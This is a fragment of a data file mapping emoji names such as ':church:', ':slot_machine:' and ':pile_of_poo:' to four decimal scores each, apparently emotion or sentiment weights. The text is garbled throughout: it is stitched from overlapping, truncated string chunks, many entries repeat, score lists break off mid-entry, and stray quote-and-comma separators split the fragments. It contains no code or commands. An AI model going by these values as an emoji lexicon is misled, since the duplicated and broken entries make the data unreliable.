\":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], 
\":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995],", "0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207,", "\":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002,", "0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\":", "[0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151,", "0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\":", "0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069,", "[0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249,", "0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214],", "\":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997,", "[0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223,", "[0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258,", "0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], 
\":woman’s_sandal:\":", "[0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177,", "\":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998,", "0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\":", "0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\":", "[0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28,", "0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998,", "0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\":", "0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139],", "\":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182,", "0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002],", "0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21,", "0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 
0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006],", "0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\":", "0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\":", "[0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107,", "0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\":", "[0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182,", "[0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201,", "0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316,", "\":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19,", "\":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002,", "0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\":", "0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147],", "\":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 
0.493,", "0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259,", "\":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165,", "\":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204,", "0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068,", "[0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14,", "\":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276,", "0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\":", "0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348],", "[0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281,", "0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\":", "0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\":", "0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095,", "0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], 
\":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188,", "\":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002,", "0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131,", "[0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067,", "[0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102,", "0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111,", "[0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998,", "0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995],", "\":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276,", "[0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191,", "0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001],", "0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\":", "\":hushed_face:\": [0.314, 
0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282,", "0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257,", "[0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203,", "[0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11,", "0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\": [0.257, 0.264, 0.24600000000000002, 0.344] }", "0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22,", "[0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099,", "\":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531,", "0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134],", "\":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239,", "0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319,", "0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203],", "\":tanabata_tree:\": [0.16399999999999998, 
0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24,", "0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\":", "0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\":", "0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995,", "0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\":", "\":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179,", "[0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302,", "0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\":", "0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\":", "0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\":", "0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\":", "0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308],", "0.096], 
\":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15,", "[0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001,", "0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177,", "[0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073,", "0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\":", "[0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996,", "0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153,", "0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998],", "0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999,", "\":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392,", "[0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268,", "0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\":", "\":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 
0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198,", "0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267],", "0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\":", "[0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114,", "0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122],", "0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\":", "0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212],", "\":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18,", "\":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289,", "\":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301,", "0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177,", "0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\":", "[0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], 
\":wrench:\": [0.25, 0.313, 0.337,", "0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002],", "\":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185,", "0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\":", "\":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168,", "\":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999,", "[0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122,", "0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166],", "0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\":", "0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\":", "\":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999,", "0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188,", "0.107, 
0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098],", "0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\":", "0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122,", "0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17],", "0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204],", "[0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156,", "0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\":", "[0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503,", "[0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08,", "0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254,", "0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997,", "0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], 
\":face_with_open_mouth:\": [0.271,", "0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005],", "0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996,", "0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\":", "0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\":", "0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\":", "0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032],", "0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996],", "[0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248,", "[0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081,", "0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141],", "[0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154,", "[0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 
0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316,", "\":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21,", "[0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003,", "0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303],", "[0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215,", "0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215],", "[0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998,", "0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\":", "[0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17,", "[0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285,", "0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\":", "0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131,", "[0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075,", "0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], 
\":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099,", "\":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154,", "\":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171,", "0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\":", "[0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002,", "0.141, 0.09], 